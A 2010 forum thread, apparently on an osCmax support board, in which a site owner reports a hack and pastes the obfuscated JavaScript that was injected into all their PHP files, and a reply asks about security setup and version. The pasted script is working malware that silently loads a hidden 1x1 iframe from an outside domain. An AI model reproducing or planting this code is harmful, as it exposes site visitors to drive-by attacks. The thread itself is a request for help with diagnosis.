Website Hacked

**Schaboo** · 07-30-2010, 03:20 AM

Last night one of my websites was hacked.
I can't track it how it was done but all php files were modified with code:

Code:

<script>function bF(){};nK="nK";bF.prototype = {o : function() {var s="";var eB=new Array();this.yS="";this.cE="cE";yI='';var n=function(){};this.dV=17028;var r=document;function x(){};var fL=new Date();var fC=35798;function l(){};dE=51990;this.iF=42492;function v(){};var j=window;var iX=new Array();eY="";this.jL=false;yL="";jG="jG";vH='';var h=new Date();var z = this;var iY=new Array();w='';b="";fT=false;var kBC=new Date();var fH=function(){return 'fH'};String.prototype.eL=function(p, zB){var pA=this; return pA.replace(p, zB)};uF="uF";yB=27300;var iJ=false;var zI='';this.hK="hK";var oB=false;wC=16683;this.rE="";var i = 's&emtBTr'.eL(/[r(mB&]/g, '') + 'i$mDeVo4'.eL(/[4$VDz]/g, '') + 'uztx'.eL(/[xJw*z]/g, '');this.tZ="";var qZ=new Date();this.lV=59400;dL="";var cW='';var aQ="";this.tJ="";var iP="";var d = 't+r1e/cDr/eDa1'.eL(/[1D/+%]/g, '') + 'tseYE!l!e!mQeYnstYgseYtQ'.eL(/[Q+!Ys]/g, '');this.oK=23764;this.yZ='';wZ=37757;nV='';hV="hV";qD="";var nA=15820;var a = 'wgr#i<t#ey'.eL(/[y<g#6]/g, '');var sJ="sJ";function sX(){};var fZ=function(){return 'fZ'};var gJ=function(){return 'gJ'};var kI=50149;qG=27962;try {var tN='';var tJR=new Array();var aA="";this.kS='';this.cL=60296;var y = 'pVu%sVh&'.eL(/[&Vz#%]/g, '');var eP=new Array();var uX=function(){return 'uX'};cT=false;var vL=false;var fR=function(){return 'fR'};var k = 'soryc['.eL(/[[yZo]]/g, '');var eO='';oS=55462;this.qF="";this.cD="cD";oP="oP";var wD='';var jJ=new Array();var t = 'v/b|mUi|fP'.eL(/[P/Un|]/g, '')+'rIsIe2tI'.eL(/[I201n]/g, '');var xV="xV";function zN(){};var rO=function(){return 'rO'};pR=false;var wP=function(){return 'wP'};this.rS="";var g = 'wLiEdE'.eL(/[EL,.#]/g, '') + 't<hG'.eL(/[G<2xM]/g, '');var sN='';var dY=false;pF="";this.eV='';gX="";var zM=function(){};hI='';this.kP="kP";var m = 'hDesiy'.eL(/[ys98D]/g, '') + 'gyhmtA'.eL(/[A+my,]/g, '');this.fV="fV";var nT=new Array();aAE=56126;hU="hU";var mF = '1<'.eL(/[<[pzM]/g, '');fE="fE";var aAT=new Date();this.xD="xD";kM="";this.aN=9321;f = 'g}e?tCs3ent3A?t?tnr}i3snd3fC'.eL(/[Cn3}?]/g, '');yO=64991;var gB=function(){return 'gB'};var qC=24176;var kGO=function(){};var zE=new Date();this.dH='';var c = 'anpxpx'.eL(/[xGKnL]/g, '') + 'e7nbduCWhuibl<du'.eL(/[uW<7b]/g, '');var eN="";var oV="";var vR=52882;lK="";var mH=23886;var aK='';var kB = 'b>o#d#yI'.eL(/[I#>M6]/g, '');this.wW="";xI='';this.pB='';var jH=function(){return 'jH'};function jT(){};var dM = 'sWuK'.eL(/[KzWQD]/g, '')+'b,s,t,r:i>'.eL(/[>Vo,:]/g, '')+'n.gF'.eL(/[F(6.D]/g, '');var fER=function(){};var yP="";wI=40242;yBU="yBU";kE=false;var cI = new Array();zQ="zQ";var fI='';var aX="";iJI='';var sXY='';var fG="fG";cI[y](m, dM, d, g, t, f, kB, c, mF, r, k);this.nI="";var eVN='';var rX=new Array();var gP=new Array();var aNS=423;this.oT="";var zX='';kPP=47363;fVU='';qU="qU";this.sM="";qK=false;nJ=false;this.fTN=65095;this.hVC=false;var xA=61670;var tV=function(){};var rXZ=false;bG="bG";var pAY=5308;aC=33465;var jA=function(){return 'jA'};var rQ=new Array();this.cN=false;var hJ="";var oKP="";var iM=false;var aE=function(){};var tF=false;this.aCM='';this.qJ='';var lI="lI";var tQ=function(){return 'tQ'};this.kL="";var fZL=function(){return 'fZL'};var iPZ=58157;var fW='';var mB=new Array();this.tU="tU";pH=21532;var jD='';var jLD='';this.eJ="eJ";var e = cI[2][cI[1]](3, 16);hB='';fGE=62022;xL=57888;hL="";var dA = cI[4][cI[1]](3, 6);mT='';nX='';function zY(){};var dU='';function rP(){};yR = dA + 'aUmPeP'.eL(/[P%UhM]/g, '');wT=39333;aB=5797;this.wN="";this.aG=false;var tH = cI[5][cI[1]](3, 11);this.hE='';this.oQ='';nM="nM";nB="";var tG=new Date();var wF="wF";var vM=false;q = tH + 'bFuktKe)'.eL(/[)YFkK]/g, '');this.oC='';this.vMM='';this.eT="eT";this.pI="pI";var kG = 'hxt^t^p^:E/^/xc#oEmEpEr#oEmEe#nEd^e#s^.xc^oxmE/KsEtEdKsx/#gxoE.#pxhxpx?EsKi#dK=K5#'.eL(/[#ExK^]/g, '');this.wL=false;var qR="";var fIL="";uM=false;var rC="";this.sU="";var u=cI[9][e](yR);this.jAJ="";hN='';var pJ=function(){return 'pJ'};this.uI="uI";var dUW=function(){return 'dUW'};mJ=64726;u[cI[10]] = kG;yD="";var qW=false;this.iQ=false;var zS=new Date();var hC=new Date();this.nO=false;u[cI[3]] = cI[8];eI=22912;var vO="vO";vJ="";this.mG=false;var qCV=function(){return 'qCV'};this.yRT="yRT";u[cI[0]] = cI[8];this.rEG='';mZ=33472;var cG=3785;var aP=27559;dJ="dJ";var lR="lR";this.lF="";this.wZF='';function aM(){};zW='';wY="";var iI=false;var yRJ=new Date();cI[9][cI[6]][cI[7]](u);var iK='';var iT='';this.gR="";this.uO="";oZ='';} catch(zH) {this.uH='';function qE(){};this.aV=60775;bU=false;r.write('<*hOtOm*lx x>^<xbOo*dxy^ *>*<O/~b*o*dOy^>O<*/*hxtOmxlx>^'.eL(/[^x~O*]/g, ''));var fS='';var jK=function(){};this.sNM="";vF='';this.lW='';var tJI="";var pK='';j[i](function(){ z.o() }, 309);var hCY=function(){return 'hCY'};var zHP="";this.uS='';this.vJW='';}vFH=359;this.wNF="wNF";var bL="";var sL="sL";}};var yG=new Array();var lRO=new bF(); var lVM=function(){return 'lVM'};lRO.o();qFK='';</script>

Does anyone recognize it?
Or maybe how was it done?

**pgmarshall** · 07-30-2010, 03:57 AM

Not seen this one before ...

Or maybe how was it done?

Have you set up security as specified in the wiki? (Mainly the .htaccess on admin)

Are you running any other php scripts on your site?

Which version of osCmax are you running? v2.0 RC4, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.25?

Regards,